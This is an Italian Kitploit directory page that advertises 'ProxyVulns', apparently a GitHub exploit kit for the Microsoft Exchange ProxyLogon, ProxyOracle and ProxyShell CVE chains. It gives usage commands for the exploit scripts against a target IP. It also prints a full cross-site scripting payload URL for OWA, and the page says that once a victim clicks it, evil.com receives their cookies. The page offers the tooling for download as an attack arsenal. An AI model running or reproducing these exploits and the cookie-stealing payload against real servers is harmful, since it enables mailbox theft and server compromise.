Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
ProxyVulns — [ProxyLogon] CVE-2021-26855 & CVE-2021-27065 Exploit del bug RawIdentity corretto. [ProxyOracle] CVE-2021-31195 & CVE-2021-31196 Catene di exploit. [ProxyShell] CVE-2021-34473 & CVE-2021-34523 & CVE-2021-31207 Catene di exploit. | Kitploit
Strumenti/GitHubGitHub/hosch3n/proxyvulns
Framework di ExploitAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingSviluppo Payload
GitHubhosch3n/proxyvulns

ProxyVulns

[ProxyLogon] CVE-2021-26855 & CVE-2021-27065 Exploit del bug RawIdentity corretto. [ProxyOracle] CVE-2021-31195 & CVE-2021-31196 Catene di exploit. [ProxyShell] CVE-2021-34473 & CVE-2021-34523 & CVE-2021-31207 Catene di exploit.

Vedi Repository
177333 anni faRevisionato da Kitploit

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

ProxyVulns

ProxyLogon

Utilizzo: python3 26855.py 1.1.1.1

ProxyOracle

root@kitploit:~
Una volta che la vittima clicca su questo link, evil.com riceverà i cookie.

https://ews.lab/owa/auth/frowny.aspx?app=people&et=ServerError&esrc=MasterPage&te=\&refurl=}}};document.cookie=`[email protected]:443/path/any.php%23~1941962753`;document.cookie=`X-AnonResource=true`;fetch(`/owa/auth/any.skin`,{credentials:`include`});//
root@kitploit:~
pip3 install pycryptodome

Utilizzo: python3 31196.py 1.1.1.1 'cadata=xxx; cadataTTL=yyy; ...'

ProxyShell

root@kitploit:~
pip3 install pypsrp

Utilizzo: python3 34473.py 1.1.1.1

Utilizzo: python3 31207.py 1.1.1.1 [Percorso file locale] [Percorso assoluto UNC]

Non funziona in alcune versioni del target (a causa del percorso /@gmail.com), forse lo riparerò dopo

Altri

  • Cookie: securitytoken=foobar

  • /owa/calendar/[email protected]/foobar/owa14.aspx/.js

Riferimenti

Analisi della vulnerabilità di ProxyLogon (Cinese)

https://docs.microsoft.com/en-us/exchange/architecture/mailbox-servers/recreate-arbitration-mailboxes?view=exchserver-2019

Analisi della vulnerabilità di ProxyOracle (Cinese)

https://github.com/mwielgoszewski/python-paddingoracle

Analisi della vulnerabilità di ProxyShell (Cinese)

Scarica lo strumento